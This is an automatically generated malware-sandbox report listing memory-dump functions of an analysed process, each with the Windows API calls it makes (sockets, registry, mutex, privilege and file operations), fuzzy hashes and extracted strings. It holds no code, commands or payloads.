Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: c32cb72b6b29e3432526a92dfdc4b42de216b5d20eb69459217e73ac18f84ece
Instruction ID: 93b5cb0d5c13831a6e4afb85d2e75a84867a50da14f8ab4dc9271dac7c6ac508
Opcode Fuzzy Hash: c32cb72b6b29e3432526a92dfdc4b42de216b5d20eb69459217e73ac18f84ece
Instruction Fuzzy Hash: C621D375509380AFDB128F25DC44B52BFF4EF06210F0884DAE9898F263D2719918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05292523, Relevance: 1.6, APIs: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 052925A7

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 13423a9679ad93409d02aa865204bbbe87d3da44a403699583b3d01cb3d0ee25
Instruction ID: 3f1b1cd3e5cd1b6fb832564537b3da753407c870ee330f9a7e0eef431f53556f
Opcode Fuzzy Hash: 13423a9679ad93409d02aa865204bbbe87d3da44a403699583b3d01cb3d0ee25
Instruction Fuzzy Hash: 0B218375508384BFEB11CB25DC94F56FFA8EF46310F0884ABEA499B252D264A508CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052912DF, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 05291355

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 7b1a5f437143e05450bae44daedfa6d6d9a59b39c972f10e6fff6d6bf73c3966
Instruction ID: 41a8073d20767171fabf6ef292affce75c90b92c88cbe0772b99459bf93e5402
Opcode Fuzzy Hash: 7b1a5f437143e05450bae44daedfa6d6d9a59b39c972f10e6fff6d6bf73c3966
Instruction Fuzzy Hash: 7621AE718097C0AFDB238B21DC51A52FFB4EF17214F0980DBE9848B663D265A51DDB62

Uniqueness

Uniqueness Score: -1.00%

Function 05292546, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 052925A7

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 713f17fc9fbd1da0788ed7544f076365153077a143d0d1cf1012bc552003b212
Instruction ID: ba783509c7f681207cd62a8342898d7d56ce74ac1b6d92bbc318ce784d9b6a85
Opcode Fuzzy Hash: 713f17fc9fbd1da0788ed7544f076365153077a143d0d1cf1012bc552003b212
Instruction Fuzzy Hash: 83119D75500204FFEB24DF25DC85FA6FBA8EF44320F14846BEE499B251D6B4A508CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 052910DA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05291123

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6a92b509db0c40778124661756a35107a1c03f6bd3577b6e2624105910d5112d
Instruction ID: bae02790b408610450a8faef13bb115cacb3aed5f6df9b4345e2eab7812e8047
Opcode Fuzzy Hash: 6a92b509db0c40778124661756a35107a1c03f6bd3577b6e2624105910d5112d
Instruction Fuzzy Hash: 35119E31500601AFDF20CF56D844B66FFE4EF04220F08C4AADD4A8B622D271E418DF61

Uniqueness

Uniqueness Score: -1.00%

Function 05290D66, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 05290D98

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 305d8f4ff87b1bd9dfdf74f1c2c24389842b455234b71d14ff9ee906050f4b5b
Instruction ID: 1a36fc04a349b9b83744594563725ccf4568357afef25164287c026b5dbf7ef7
Opcode Fuzzy Hash: 305d8f4ff87b1bd9dfdf74f1c2c24389842b455234b71d14ff9ee906050f4b5b
Instruction Fuzzy Hash: 5D01AD758102449FDB10CF15D888BAAFFA4EF84220F18C4AADD099F316D6B5A408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0529131A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 05291355

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0edb6ea3ace88f374e113d6b55d7d5cc8c6e83317502ed248d82852d67cb9a70
Instruction ID: a20e38cb72904aec3696ca1e556cda8484d2d5e8cc4493e9aaa0833a092ee5b2
Opcode Fuzzy Hash: 0edb6ea3ace88f374e113d6b55d7d5cc8c6e83317502ed248d82852d67cb9a70
Instruction Fuzzy Hash: ED018F31810640DFDB24CF16D845B66FFA5FF08320F08C49ADE490B722C2B5A418CF62

Uniqueness

Uniqueness Score: -1.00%

Function 052323A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3499e8384a7b43bf6ac2651baf579053fcc616b6e2e8be87ea02705098608596
Instruction ID: 15a524b82cbf56827e5714fd7e0abbce182e0aba811fb73e2a96a07e0110dd41
Opcode Fuzzy Hash: 3499e8384a7b43bf6ac2651baf579053fcc616b6e2e8be87ea02705098608596
Instruction Fuzzy Hash: 6312BEB4A24226DFCB28CF69C58166DBBF3FF84304F248179D42ADB254DB759885CB50

Uniqueness

Uniqueness Score: -1.00%

Function 05238798, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13838bafdd6c7abd3d7080d57a51e25961f41b386382d145298e9556bae8e29a
Instruction ID: 24353a7cec81b35f968c406b87b28b1a4becdee357e22e5828689f6807f7c6ef
Opcode Fuzzy Hash: 13838bafdd6c7abd3d7080d57a51e25961f41b386382d145298e9556bae8e29a
Instruction Fuzzy Hash: 7B12B0B5A2121ADFCB24CF69C49266DBBF3FF84304F149569E016EF284DBB59885CB40

Uniqueness

Uniqueness Score: -1.00%

Function 05232FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44659c8f18edbb7c0b78292ea212667f12c89ac7bea76d5064eccbbad4cbe42b
Instruction ID: a685ec152bf17005be7e40121802f7c067ddbc7555dd65876e56b0973a67902f
Opcode Fuzzy Hash: 44659c8f18edbb7c0b78292ea212667f12c89ac7bea76d5064eccbbad4cbe42b
Instruction Fuzzy Hash: 5681AB71F101159BDB18DB69C981A6EBBE3AFC8310F2A8479D41AEB365DE71DD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 052309A0, Relevance: 5.1, Strings: 4, Instructions: 138COMMON

Download Yara Rule

Strings

X1kr, xrefs: 05230A98
X1kr, xrefs: 05230A50
X1kr, xrefs: 05230AA2
X1kr, xrefs: 05230A5A

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr$X1kr$X1kr
API String ID: 0-2451847431
Opcode ID: 5aaa1bfc8a94b0109882b7e26510934209398780a017adec82c7c3268dc775db
Instruction ID: 938f8bd1a91858422bcce2a54e7c79e7febbf925a5c46b2f937516c993e034c3
Opcode Fuzzy Hash: 5aaa1bfc8a94b0109882b7e26510934209398780a017adec82c7c3268dc775db
Instruction Fuzzy Hash: A141C631B10205DFCB14DF68D458AADBBB7FF84304F2541A9E5569B3A0CB71AC16CB90

Uniqueness

Uniqueness Score: -1.00%

Function 052302E8, Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

`5kr, xrefs: 052303A5
:@Dr, xrefs: 05230537

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: :@Dr$`5kr
API String ID: 0-2548079215
Opcode ID: ef7bbd85e5fcec3d6be87fe350f07a0184fd44ee38078d58af43e86e5dd7b812
Instruction ID: 698faa4e3658b596691f0eecd2b033ab12806a394a10ec3d200be80037bc55dc
Opcode Fuzzy Hash: ef7bbd85e5fcec3d6be87fe350f07a0184fd44ee38078d58af43e86e5dd7b812
Instruction Fuzzy Hash: 4B51AD71A15201CFDB08DF68C555B6E7BF3BF89710F1480A9D906AB391DB75AC01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05232D58, Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

>_Ir, xrefs: 05232DA5
, xrefs: 05232E76

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: $>_Ir
API String ID: 0-1787506450
Opcode ID: 1a06e698c9d695660cd927ec58f943570f841181810642ec1db4b9747ac5eb19
Instruction ID: 7ade6a64b9407b65f2cf2ca197b48efdd6a75ca72a3abdb80e460f06fd344c58
Opcode Fuzzy Hash: 1a06e698c9d695660cd927ec58f943570f841181810642ec1db4b9747ac5eb19
Instruction Fuzzy Hash: D041A2B8F34215CBCB14DF69C8829BEB7B3BFC4214B25C476C4169B605C675F8468791

Uniqueness

Uniqueness Score: -1.00%

Function 052312A0, Relevance: 1.7, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

$ghr, xrefs: 05231349

Memory Dump Source

Source File: 00000003.00000002.493136552.0000000005230000.00000040.00000001.sdmp, Offset: 05230000, based on PE: false

Similarity

API ID:
String ID: $ghr
API String ID: 0-1352911727
Opcode ID: fa61e093999be93ecb5e01f9b9f106b5dac05a7e1305f820c790b1812981f206
Instruction ID: 8fbb692415f4f850421bb1496d97e372a36bf21c2a02b593614475611cd36291
Opcode Fuzzy Hash: fa61e093999be93ecb5e01f9b9f106b5dac05a7e1305f820c790b1812981f206
Instruction Fuzzy Hash: EC221574A10605DFCB24DF28C580A6ABBF2FF88310F1085A9D86A9BB55DB35ED85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05291E49, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 05291F59

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: 918d234488a7729d37e6aec0a0d0535e7e8e22e1f7279390603c470155dd7160
Instruction ID: 796756dd4173bc559c735d128bd628b4e2e0c49b3d84d21370383bf528b3712c
Opcode Fuzzy Hash: 918d234488a7729d37e6aec0a0d0535e7e8e22e1f7279390603c470155dd7160
Instruction Fuzzy Hash: 4741D4715093806FE712CB25DC45F92FFB8EF46220F1884DBE9849F293D265A508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05291460, Relevance: 1.6, APIs: 1, Instructions: 103networkCOMMON

Download Yara Rule

APIs

DnsQuery_A.DNSAPI(?,00000E2C,?,?), ref: 05291532

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Query_
String ID:
API String ID: 428220571-0
Opcode ID: 9883509529bd8f173d957b4ebc4cd1885aab53075e039a081e5ed05630507de1
Instruction ID: 3dd21523d2ea286758258ea83b27dcd5d15ba96d4f9dd75b4f75e5c978a915ef
Opcode Fuzzy Hash: 9883509529bd8f173d957b4ebc4cd1885aab53075e039a081e5ed05630507de1
Instruction Fuzzy Hash: 91315A6540E3C05FD3138B318C61B61BFB4EF87614F0A81CBE8848F5A3D269690AC7B2

Uniqueness

Uniqueness Score: -1.00%

Function 052919AF, Relevance: 1.6, APIs: 1, Instructions: 103networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05291A6A

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 34386e5e92fdad390db9bdcf38c74978a633b345aae1d746d800b15fdb3a3aa3
Instruction ID: ef2010ba991ecf668dc837c32068906fa80ac1af258a2078641a346348ffba96
Opcode Fuzzy Hash: 34386e5e92fdad390db9bdcf38c74978a633b345aae1d746d800b15fdb3a3aa3
Instruction Fuzzy Hash: B931A27150D3C1AFEB13CB61CC54B56BFB4EF06210F0885DBE9858F2A3C265A819CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0529241C, Relevance: 1.6, APIs: 1, Instructions: 95timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 052924B9

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: b413b6a6ffa94082b772efe9f9d37caad7b76bb04a532255f80d532776a01955
Instruction ID: 021b09700afeaf1d8d3286de57c04d751709bb7b77b2a7321e54134b30d0b6df
Opcode Fuzzy Hash: b413b6a6ffa94082b772efe9f9d37caad7b76bb04a532255f80d532776a01955
Instruction Fuzzy Hash: FE31EAB6009380AFEB128F25DC45F96BFB8EF46310F0484EBE9859F152D265A509C771

Uniqueness

Uniqueness Score: -1.00%

Function 0529299D, Relevance: 1.6, APIs: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 05292A5E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: e869c351daea9479c0db3664f3593ee1bbdb216f677a6ee256e74c24eab7a8d0
Instruction ID: 016bd66de4226f9905402fc2352b6a51bb9b42f5f6d865ba762879f0ae70a398
Opcode Fuzzy Hash: e869c351daea9479c0db3664f3593ee1bbdb216f677a6ee256e74c24eab7a8d0
Instruction Fuzzy Hash: 37316F7654E3C45FD7038B718C61A66BFB49F87610F1E80CBD8848F2A3E6646919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05290390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0529045E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 06a12f4c431f8c6137653d41cebaa8e846d8f7e83c5d5b691c3d348ac9f0d30d
Instruction ID: 197f0b0e25ab55a7f62037a8003d23b33c75a5dfba021e071715f63b99f04c0d
Opcode Fuzzy Hash: 06a12f4c431f8c6137653d41cebaa8e846d8f7e83c5d5b691c3d348ac9f0d30d
Instruction Fuzzy Hash: 8E31B7B2004344AFE722CF11CC45FA6FFB8EF06714F14859EE9859B152D3A5A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052907F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05290899

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 334e24afbdea268dcdf41467b6804fa0f6d406c341b84f3df236e86efcb43c45
Instruction ID: 6817bf652a6ee3c67e5b8ff5d643d0e39ad840d07cc46ba3ddb4cfa00def9b13
Opcode Fuzzy Hash: 334e24afbdea268dcdf41467b6804fa0f6d406c341b84f3df236e86efcb43c45
Instruction Fuzzy Hash: C8316F71504384AFE722CB65DC44FA6BFE8FF45610F0884AEE9858B252D365E809DB71

Uniqueness

Uniqueness Score: -1.00%

Function 052900F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0529019D

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: f5d6a842700290918aadae294d86a2810f5edd2d3a3f7bd5aa9ddcf91e4b8067
Instruction ID: c6a86d66758a6c2c937fae0d167fbe627bda0c7f571147fb5fb5cfdb014907aa
Opcode Fuzzy Hash: f5d6a842700290918aadae294d86a2810f5edd2d3a3f7bd5aa9ddcf91e4b8067
Instruction Fuzzy Hash: D131A471509784AFE712CB25DC44F56FFF8EF06210F08849AE985CB292D375E909CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05291FB0, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 05292062

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 22614a70cd42887445d7f77946c4b795387cd03beff72b10a72e45abfa8f080a
Instruction ID: b9c0bb9e5059610f157c28ad5c07f6750a99ff23bd65cec010a546e551c22d01
Opcode Fuzzy Hash: 22614a70cd42887445d7f77946c4b795387cd03beff72b10a72e45abfa8f080a
Instruction Fuzzy Hash: BA31D672404780AFE722CB55DC45F96FFF8FF0A320F04859AE9859B252D375A509CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052904AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 0529055C

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3771f89241301aa18d6c7f4c6d001a1c0391e6c51f2b9f0a67f7bee2407c47c0
Instruction ID: e301f3903ebd04fe2abfe22abce4fb3427f3216cf287a37af90dea5c8012c357
Opcode Fuzzy Hash: 3771f89241301aa18d6c7f4c6d001a1c0391e6c51f2b9f0a67f7bee2407c47c0
Instruction Fuzzy Hash: 7F318271509784AFDB22CB65DC44F52BFF8AF07310F0885DAE9859B262D264A809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052908F0, Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290985

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 80aac7779322854835af6b01cef0e342e77a25a4de833416018a38979998ed37
Instruction ID: 5b29f23a11b73d6cd4b77390861775e310cee314279019edee087f4d031b7a8a
Opcode Fuzzy Hash: 80aac7779322854835af6b01cef0e342e77a25a4de833416018a38979998ed37
Instruction Fuzzy Hash: 1521F8B54093846FF7128B25DC41FA2BFA8EF47720F1884DBEE849B293D2646909C771

Uniqueness

Uniqueness Score: -1.00%

Function 052902AB, Relevance: 1.6, APIs: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,00000E2C), ref: 05290353

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 426ee144332075831ca846e4ccddfee86a0564dbfaba9c9d071222746be61e4d
Instruction ID: 122bd97f635c02614b6c5247d58c475ea2b41feb19820f40bb84cb8a7cc7af37
Opcode Fuzzy Hash: 426ee144332075831ca846e4ccddfee86a0564dbfaba9c9d071222746be61e4d
Instruction Fuzzy Hash: 9E21B775009384AFE7228F21DC45FA6FFB4EF06310F1884DAED849B192D265A909CB75

Uniqueness

Uniqueness Score: -1.00%

Function 0529081A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 05290899

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1842bf94091dbbd833cab9719fe13d1a5be953f209f79e617c11fa76c3b7b770
Instruction ID: 7fc8d7d4f097570b98117ca24d03a50a27f0af4ea8ee8d5b51dc398431bc8692
Opcode Fuzzy Hash: 1842bf94091dbbd833cab9719fe13d1a5be953f209f79e617c11fa76c3b7b770
Instruction Fuzzy Hash: 4E217C75600604AFEB25DF65C848FA6FBE8FF08610F14846AE9898B351D771E408CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05290C58, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E2C), ref: 05290CEF

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: f9d2b3593b302deb751409db7f5079f2c0152cebcb16dae6a495dd3b40940a96
Instruction ID: 1ed41529014df58bab8dc942a6a0ea5d317a7d16cc77faf4011e3221e505a46f
Opcode Fuzzy Hash: f9d2b3593b302deb751409db7f5079f2c0152cebcb16dae6a495dd3b40940a96
Instruction Fuzzy Hash: 5A210A71104384AFE7218B25DC45FA6FFB8DF46710F1880DAFD849F292D275A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05290B79, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290C10

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7c5b505bd855a595f77e310fed2b29afebb3d58c483d0c32af295500b7e79fd6
Instruction ID: 487a943e6ba4f646e1d3f0c76700f59d74cd14a5ea7681ffa944a780ed5d706b
Opcode Fuzzy Hash: 7c5b505bd855a595f77e310fed2b29afebb3d58c483d0c32af295500b7e79fd6
Instruction Fuzzy Hash: 1E219DB2508744AFEB218B15DC85F67FFE8EF05710F08849AE9899B252D264E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052903CA, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 0529045E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 6df9e477fdc6d9dabbbb9dba0971efbf5b3c21f68507820291d896a3bb4dcaaa
Instruction ID: 337b4f5f70c64a08d7e9b94680a29f813978d7788bcb97ac3b46064af5a52b1c
Opcode Fuzzy Hash: 6df9e477fdc6d9dabbbb9dba0971efbf5b3c21f68507820291d896a3bb4dcaaa
Instruction Fuzzy Hash: 7F21F2B2000204AFFB21DF15CC45FA6FBACEF04710F10895AEE469A281D6B1A509CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052909C0, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,ACD6084B,00000000,00000000,00000000,00000000), ref: 05290A51

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 9d36a684649de6d02d0bb73950f5dcf5218212247852a8cea7df2ea10bae822d
Instruction ID: d76bcd948cf27142943ef543fb378fb715fb06df7d54a63250c36ec13a292314
Opcode Fuzzy Hash: 9d36a684649de6d02d0bb73950f5dcf5218212247852a8cea7df2ea10bae822d
Instruction Fuzzy Hash: 9E217771409384AFD722CF65DC44F56FFB8EF46314F08849BEA459B153C265A509CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0529012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 0529019D

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 8338d358d588b784711cd0ca27e7a8e9d8a44bb6a4ecd086e71961442c735f05
Instruction ID: dd48e9d6ce711b78d9c4a03c7227df82b92193c75b369e624c2b52bd41e8fb32
Opcode Fuzzy Hash: 8338d358d588b784711cd0ca27e7a8e9d8a44bb6a4ecd086e71961442c735f05
Instruction Fuzzy Hash: BA21BB71504204AFEB24DF29DC88F6AFBE8EF08610F14846AED498B341D7B0E908CA75

Uniqueness

Uniqueness Score: -1.00%

Function 05290723, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 0529079F

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: ea72b1d83bc73c764046bb286f3c6c2726fe61f0f3e82bc8cab161cf52c8f885
Instruction ID: 705253233134591dd590fb0c7d9ee4508353f4828eb3021efe3e7de34c5ae3ea
Opcode Fuzzy Hash: ea72b1d83bc73c764046bb286f3c6c2726fe61f0f3e82bc8cab161cf52c8f885
Instruction Fuzzy Hash: 0C21B6755093849FDB15CB25DC84B96BFE8EF06210F0984DADD49DF252D274D908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05290A9B, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 05290B1E

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: c2ddacd0cdb48dec72f31bb09a4c9941e71cf968adca6f7f3ad86ecbcbf24b49
Instruction ID: 9aff5f39cc34e5627053f83733f4f9cee21659c15726d7ea096d0081596e8cb4
Opcode Fuzzy Hash: c2ddacd0cdb48dec72f31bb09a4c9941e71cf968adca6f7f3ad86ecbcbf24b49
Instruction Fuzzy Hash: 9E21C5B15083845FDB12CF25DC55B52BFE8AF46314F0880EAED49DB253D224D808C771

Uniqueness

Uniqueness Score: -1.00%

Function 052901F4, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05290264

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 562ce577c648387eec2a4ce91e71e66516ef83aa2890ce3ee913b7dd90daa0fe
Instruction ID: 485a4214503dbdeb44bebb1ba495f0077d5ca76d77d7d22aaf4e8e223787fc86
Opcode Fuzzy Hash: 562ce577c648387eec2a4ce91e71e66516ef83aa2890ce3ee913b7dd90daa0fe
Instruction Fuzzy Hash: A221C2B1809785AFD712CB64DC49B51FFA8FF42220F0984ABDD849F663D234A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05291170, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052911DC

Memory Dump Source

Source File: 00000003.00000002.493297339.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: da803111ea8140040d02ea14bef82341c5091e7175207fb7bf623a8759c9d794
Instruction ID: c3c3b5aaf50f6edf561aca879a31d50e352f08d9194b01a001f31c6f8b09d8da
Opcode Fuzzy Hash: da803111ea8140040d02ea14bef82341c5091e7175207fb7bf623a8759c9d794
